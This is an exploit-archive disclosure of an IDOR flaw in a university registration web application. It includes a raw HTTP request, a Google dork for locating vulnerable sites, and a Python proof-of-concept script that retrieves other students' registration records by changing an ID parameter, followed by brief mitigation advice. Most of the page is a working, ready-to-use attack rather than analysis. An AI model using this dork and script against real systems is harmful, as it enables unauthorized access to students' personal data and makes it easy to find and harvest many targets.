University Registration System - IDOR Leads to Information Disclosure

2025.03.25

wa0_3 (EG)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: University Registration System - IDOR Leads to Information Disclosure
# Date: 2025-03-25
# Exploit Author: wa0_3/td9_l
# Telegram: @wa0_3/@td9_l
# Category: WebApps
# CVE: N/A

## Description:
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the University Registration System, allowing unauthorized users to access and modify registration details of other students by manipulating the `paramPgregistrationId` parameter.

## Vulnerable Endpoint:
```
GET Registration/PG/PG_Register.aspx?paramPgregistrationId=(id) HTTP/1.1
Host: target-university.edu
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: ASP.NET_SessionId=gky2cc33uoduykncb5mrz5e3
Connection: keep-alive
```

## Google Dork:
```
inurl:Registration/PG/PG_Register.aspx
```

## Proof of Concept (PoC):
```python
import argparse
import requests

parser = argparse.ArgumentParser(description='Exploit IDOR in University Registration System')
parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
parser.add_argument('-id', help='Target Registration ID', required=True)
args = parser.parse_args()

url = f"{args.url}Registration/PG/PG_Register.aspx?paramPgregistrationId={args.id}"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "keep-alive"
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    print("[+] Exploit Successful!")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Exploit Failed")
```

## Impact:
An attacker can enumerate `paramPgregistrationId` values to view and potentially modify sensitive student registration details without authentication.

## Mitigation:
- Implement proper access control checks to ensure only authorized users can access their own data.
- Use session-based authentication to verify user privileges before serving sensitive data.
- Implement rate limiting and monitoring to detect abnormal access patterns.

## Credits:
Discovered by **wa0_3** (@wa0_3)

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

University Registration System - IDOR Leads to Information Disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

University Registration System - IDOR Leads to Information Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.